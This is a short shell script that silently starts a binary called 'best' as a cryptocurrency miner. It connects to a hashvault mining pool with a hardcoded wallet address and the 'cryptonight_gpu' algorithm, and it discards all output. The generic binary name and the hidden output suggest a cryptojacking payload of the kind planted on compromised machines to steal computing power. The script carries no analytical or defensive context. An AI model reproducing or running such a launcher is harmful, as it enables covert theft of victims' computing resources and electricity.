#!/bin/sh

A=singapore01.hashvault.pro:80
B=ccx7aoNYpGb7sndJtEDWvCBQhPAy9mC8QW5KWuCx8J1FJrDcDrER1XYA9LGtggrR7ZC4KfQmQ2uRN47L9WypBbNLAeq2Q4Q9WN.77626b99a74ee33aff886ae4b05ba620814eb20d8a532b0fada5f8a59110e392
C=koo
D=cryptonight_gpu
./best --tls-url $A --user $B --pass $C --currency $D >/dev/null >/dev/null 2>&1
sleep 10
